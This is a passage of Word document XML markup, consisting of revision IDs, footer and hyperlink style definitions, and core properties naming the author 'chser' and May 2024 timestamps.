    <w:rsid w:val="00153173"/>
    <w:rsid w:val="001D6327"/>
    <w:rsid w:val="004045F8"/>
    <w:rsid w:val="004532C1"/>
    <w:rsid w:val="00487D6A"/>
    <w:rsid w:val="00535DF4"/>
    <w:rsid w:val="00673BF9"/>
    <w:rsid w:val="00740492"/>
    <w:rsid w:val="008004B2"/>
    <w:rsid w:val="009063AC"/>
    <w:rsid w:val="00A409B1"/>
    <w:rsid w:val="00AA0A92"/>
    <w:rsid w:val="00AD0C1A"/>
    <w:rsid w:val="00AE13DC"/>
    <w:rsid w:val="00BB52E2"/>
    <w:rsid w:val="00BE4F71"/>
    <w:rsid w:val="00D82462"/>
    <w:rsid w:val="00D93FDC"/>
    <w:rsid w:val="00DB6CA3"/>
    <w:rsid w:val="00ED432E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262A"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{7066C7BE-C4AA-41D8-8D2D-9930F61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71"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Foot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71"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A40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chser</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>chser</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-05-24T13:51:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-05-24T13:59:00Z</dcterms:modified>
</cp:coreProperties>
</file>